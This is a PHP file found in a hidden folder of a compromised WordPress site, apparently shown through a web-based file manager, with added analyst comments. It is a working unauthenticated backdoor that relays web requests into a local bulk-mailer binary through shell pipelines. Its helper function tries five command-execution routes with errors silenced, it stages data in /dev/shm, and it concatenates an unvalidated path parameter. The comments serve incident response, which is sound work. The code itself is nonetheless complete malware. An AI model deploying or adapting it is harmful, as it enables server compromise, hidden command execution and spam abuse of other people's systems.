REDROOM
PHP 8.1.33
Size: 3.42 KB
/home/jambtst2015/public_html/cccng.org/wp-includes/js/.hm/hmw.php
<?php
// Analyst summary: this script is a CGI-style relay. It copies the HTTP request
// (query string and POST fields) into CGI environment variables plus a multipart
// body, pipes that body into a local executable (`./hm hma.htnl`) via a shell,
// and echoes the executable's output back to the client.
// The POST field names handled below (smtp_from_email, from_email, maillist, list)
// suggest the executable is a bulk mailer — presumably; the binary is not shown here.
// Artifacts a responder can look for, all visible in this code:
//   - /dev/shm/<32 hex chars>.txt files (stored JSON or base64-encoded bodies)
//   - shell children of the PHP worker running `cat`, `base64 -d` and `./hm`
//   - requests carrying the query parameters `store`, `bid` or `encode`
// The script contains no authentication or access check of any kind.

// Drop any headers already queued for the response.
header_remove();

// Step 1: Capture all GET parameters and set them in the QUERY_STRING environment variable
$env_query_string = http_build_query($_GET);
putenv("QUERY_STRING=$env_query_string");

// Initialize variables for POST data
$multipart_body = '';
$content_length = 0;
$content_type = '';

// Runs the shell command $in and returns whatever it printed.
// Tries exec, passthru, system, shell_exec and finally popen, using the first
// one that function_exists() reports — presumably so the script keeps working
// when some of these are disabled in php.ini. Every call is prefixed with `@`,
// so warnings are suppressed and nothing reaches the PHP error log from here.
// Returns '' when none of the five paths is usable.
function wEx($in) {
    $out = '';
    if (function_exists('exec')) {
        @exec($in, $out);
        // exec() fills $out with output lines; join them back into one string.
        $out = @join("\n", $out);
    } elseif (function_exists('passthru')) {
        // passthru() prints directly, so capture it with output buffering.
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    } elseif (function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    } elseif (function_exists('shell_exec')) {
        $out = shell_exec($in);
    } elseif (is_resource($f = @popen($in, "r"))) {
        // Last resort: read the command's stdout through a pipe, 1 KiB at a time.
        $out = "";
        while (!@feof($f)) $out .= fread($f, 1024);
        pclose($f);
    }
    return $out;
}

// Step 2: Extract POST data if the request method is POST
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST)) {
    // Create a boundary for multipart/form-data.
    // The boundary mimics a browser-generated one; the suffix is md5 of the
    // current Unix timestamp, not a random value.
    $boundary = '----WebKitFormBoundary' . md5(time());

    // Set the content type for multipart/form-data with the boundary
    $content_type = "multipart/form-data;boundary=" . $boundary;
    putenv("CONTENT_TYPE=$content_type");

    // Initialize the multipart body
    $multipart_body = '';

    if(isset($_GET['store']) && !isset($_GET["bid"])){
        // "store" without "bid": persist the POST fields as JSON in
        // /dev/shm/<md5 of the JSON>.txt and print that md5 to the client.
        // There is no exit here, so the request is still relayed below.
        // Nothing in this script deletes this file afterwards.
        $postJson = json_encode($_POST);
        file_put_contents("/dev/shm/".md5($postJson).".txt", $postJson);
        echo md5($postJson)."<br />";
    }elseif(isset($_GET['store']) && file_exists("/dev/shm/".$_GET["bid"].".txt")){
        // "store" with "bid": reload the previously stored fields and overwrite
        // the sender and recipient-list fields with the ones in this request.
        // NOTE(review): the "bid" request parameter is concatenated into the
        // file path with no validation or normalisation.
        $jsonCode = file_get_contents("/dev/shm/".$_GET["bid"].".txt");
        $postData = json_decode($jsonCode, true);
        $postData["smtp_from_email"] = $_POST["smtp_from_email"];
        $postData["from_email"] = $_POST["from_email"];
        $postData["maillist"] = $_POST["maillist"];
        $postData["list"] = $_POST["list"];
        $_POST = $postData;
    }elseif(isset($_GET['store']) && isset($_GET["bid"])){
        // "bid" was given but no matching stored file exists: stop here.
        echo "failed to load message data";
        exit;
    }

    // Loop through each POST variable and emit it as one multipart part.
    foreach ($_POST as $name => $value) {
        // With "encode" set, field names arrive base64-encoded and are decoded
        // here; values are passed through unchanged.
        if(isset($_GET['encode'])){
            $name = base64_decode($name);
        }
        $multipart_body .= "--" . $boundary . "\r\n";
        $multipart_body .= "Content-Disposition: form-data; name=\"" . $name . "\"\r\n\r\n";
        $multipart_body .= $value . "\r\n";
    }

    // End the multipart body
    $multipart_body .= "--" . $boundary . "--\r\n";

    // Calculate the content length
    $content_length = strlen($multipart_body);
    putenv("CONTENT_LENGTH=$content_length");
}

// Step 3: Base64 encode the multipart body
// (for a non-POST or empty request the body is '' and the steps below still run)
$encoded_body = base64_encode($multipart_body);

// Step 4: Write the encoded body to /dev/shm/<md5 of the encoded body>.txt.
// The name is derived from the content (32 hex characters); it is not random
// and not 12 characters long, despite the variable name.
$random_filename = '/dev/shm/' . md5($encoded_body) . '.txt';
file_put_contents($random_filename, $encoded_body);

// Step 5: Define the command to be executed
// The file is decoded with `base64 -d` and fed on stdin to the executable `hm`
// in the script's working directory, with `hma.htnl` as its only argument.
// The environment variables set with putenv() above are what a CGI program
// would read; presumably the child inherits them.
$command = "cat $random_filename | base64 -d | ./hm hma.htnl";

// Step 6: Execute the command through wEx() and send its output to the browser,
// with the literal header text "Content-type: text/html" stripped from it.
echo str_replace("Content-type: text/html", "", wEx($command));

// Step 7: Remove the temporary file before exiting
unlink($random_filename);

// NOTE(review): the original comment here read "Return the process exit code",
// but no code follows it; the exit status of the command is never inspected.
?>
Directory Contents
Dirs: 0 × Files: 1
Name
Size
Perms
Modified
hmw.php
3.42 KB
lrw-r--r--
2024-04-09 06:44:14